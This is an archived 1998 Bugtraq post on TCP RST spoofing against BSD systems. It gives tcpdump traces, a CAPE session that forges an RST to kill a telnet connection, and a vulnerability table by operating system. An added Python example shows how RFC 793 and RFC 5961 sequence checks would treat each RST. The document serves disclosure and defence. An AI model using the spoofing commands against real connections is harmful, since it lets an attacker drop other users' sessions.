Bugtraq mailing list archives

Re: FreeBSD's RST validation


From: oliver () SECNET COM (Oliver Friedrichs)
Date: Mon, 31 Aug 1998 13:36:35 -0600


Darren Reed brought this up in June, 1997, on the NetBSD security list,
after which I performed some tests.  I ended up with a number of
questions after doing this, but never followed up to determine what was
going on.

Anyways, here's my old message:

- Oliver
  Network Associates, Inc.

------

Ok, here's how my tests turned out:

I have 3 systems involved:

199.185.231.20 - OpenBSD system
199.185.231.24 - FreeBSD system
199.185.231.25 - BSDI system

I'm telneted from BSDI to FreeBSD, and monitoring and spoofing from
the OpenBSD system using tcpdump and CAPE.

20:25:01.261260 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: P 2752239993:2752239994(1) ack 4220895731 win 8760 <nop,nop,timestamp 750118 2277749> [tos 0x10]
20:25:01.263337 freebsd.secnet.com.telnet > bsdi.secnet.com.3349: P 1:55(54) ack 1 win 17376 <nop,nop,timestamp 2278005 750118> (DF) [tos 0x10]

So I'm logged into FreeBSD from port 3349 on the BSDI system.  On OpenBSD...

bash# ./cape -i
Welcome to CAPE.  "help" for general help, "help topic" for help on topic

Active network interfaces:
   - Interface: lo0 Address: 127.0.0.1
   - Interface: ed2 Address: 199.185.231.20

cape> iface=ed2
cape> gateway=199.185.231.24
cape> ip
cape> ip_src=199.185.231.23
cape> ip_dst=199.185.231.24
cape> ip_proto=IPPROTO_TCP
cape> tcp
cape> tcp_sport=3349
cape> tcp_dport=23
cape> tcp_flags=RST
cape> send
Processing: Packet transmitted

Here's my spoofed packet with random seq/ack numbers:

20:28:20.885563 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: R 1649760492:1649760492(0) win 4096

As soon as I hit a key on the FreeBSD system...

[20:25:01] [freebsd]
[/usr/local/scanner] % Connection closed by foreign host.

Poof, it works, repeatable every time.  This works when spoofing the
packet from the BSDI system TO the FreeBSD system.  For some reason
(which I've been unable to figure out yet), I cannot spoof packets
from the FreeBSD system to the BSDI system and have this work.
This works between OpenBSD and FreeBSD however (both ways).
This doesn't work against Solaris.

Here's what I found with the systems here:

OpenBSD 2.1 - vulnerable
FreeBSD 2.1.x - vulnerable
BSDI        - appears not vulnerable (?)
Solaris 2.5 - appears not vulnerable
IRIX    6.2 - appears not vulnerable
Linux       - appears not vulnerable
Windows NT  - appears not vulnerable
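
The tear-down reproduced above is exactly what the sequence-number check on
incoming RSTs is there to prevent: RFC 793 honours an RST only if its sequence
number falls inside the receiver's window, and RFC 5961 later tightened this to
an exact match on the expected sequence number, answering an in-window but
inexact RST with a challenge ACK instead. The Python below is an added example
and is not part of the post or of CAPE. It replays a tcpdump-style trace
modelled on the capture above, tracks the sequence number each side expects
next, and reports whether a receiver applying no check, the RFC 793 check, or
the RFC 5961 check would honour each RST. The reply's absolute sequence numbers
and the final, correctly numbered RST line are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

MOD = 1 << 32  # TCP sequence numbers wrap at 2^32

# Matches the old-style tcpdump TCP summary line used in the post:
#   "<ts> <src> > <dst>: <flags> <seq>:<end>(<len>) [ack <ack>] win <win> ..."
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) > (?P<dst>\S+): (?P<flags>[A-Z.]+) "
    r"(?P<seq>\d+):(?P<end>\d+)\((?P<len>\d+)\)(?: ack (?P<ack>\d+))? win (?P<win>\d+)"
)

# Constructed trace in tcpdump -S (absolute sequence number) style, modelled on the
# capture in the post. The reply's absolute numbers and the fourth line (an RST whose
# sequence number is exactly what FreeBSD expects next) are made up for illustration.
SAMPLE_TRACE = """\
20:25:01.261260 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: P 2752239993:2752239994(1) ack 4220895731 win 8760 <nop,nop,timestamp 750118 2277749> [tos 0x10]
20:25:01.263337 freebsd.secnet.com.telnet > bsdi.secnet.com.3349: P 4220895731:4220895785(54) ack 2752239994 win 17376 <nop,nop,timestamp 2278005 750118> (DF) [tos 0x10]
20:28:20.885563 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: R 1649760492:1649760492(0) win 4096
20:28:21.000000 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: R 2752239994:2752239994(0) win 4096
"""


def rst_verdict(seq: int, rcv_nxt: int, rcv_wnd: int, policy: str) -> str:
    """Decide what a receiver does with an RST carrying sequence number `seq`.

    policy "none"    - no check at all: every RST for the port pair is honoured
                       (the behaviour the post observes on FreeBSD 2.1.x and OpenBSD 2.1)
    policy "rfc793"  - honour the RST only if seq falls inside the receive window
    policy "rfc5961" - honour it only if seq == rcv_nxt; an in-window but inexact
                       seq gets a challenge ACK instead of tearing the connection down
    """
    if policy == "none":
        return "accept"
    offset = (seq - rcv_nxt) % MOD  # modular distance from the expected sequence number
    in_window = offset == 0 if rcv_wnd == 0 else offset < rcv_wnd
    if policy == "rfc793":
        return "accept" if in_window else "drop"
    if policy == "rfc5961":
        if offset == 0:
            return "accept"
        return "challenge-ack" if in_window else "drop"
    raise ValueError(f"unknown policy {policy!r}")


def analyse_trace(trace: str, policy: str) -> List[Tuple[str, str]]:
    """Replay a tcpdump-style trace and report, for each RST, what a receiver
    applying `policy` would do with it. Returns (timestamp, verdict) pairs."""
    expected: Dict[Tuple[str, str], int] = {}  # (sender, receiver) -> next seq receiver expects
    window: Dict[Tuple[str, str], int] = {}    # (sender, receiver) -> window receiver advertised
    verdicts: List[Tuple[str, str]] = []
    for line in trace.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        src, dst = m["src"], m["dst"]
        seq, end, win = int(m["seq"]), int(m["end"]), int(m["win"])
        # The "win" field is the sender's own receive window, so it governs data dst -> src.
        window[(dst, src)] = win
        if "R" in m["flags"]:
            rcv_nxt, rcv_wnd = expected.get((src, dst)), window.get((src, dst))
            if rcv_nxt is None or rcv_wnd is None:
                verdicts.append((m["ts"], "no-state"))  # never saw data in this direction
            else:
                verdicts.append((m["ts"], rst_verdict(seq, rcv_nxt, rcv_wnd, policy)))
        elif seq == expected.get((src, dst), seq):
            expected[(src, dst)] = end  # in-order data advances the receiver's rcv_nxt
    return verdicts


if __name__ == "__main__":
    for policy in ("none", "rfc793", "rfc5961"):
        print(policy, analyse_trace(SAMPLE_TRACE, policy))
```

Running it shows the spoofed RST from the post (sequence 1649760492 against an
expected 2752239994 and a 17376-byte window) honoured under "none" and dropped
under both standards, while the correctly numbered RST is honoured everywhere.
That difference is what separates the "vulnerable" rows from the "appears not
vulnerable" rows in the table, and a passive monitor applying the same window
test to RSTs on a link would flag the spoofed one regardless of how the host
handles it.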


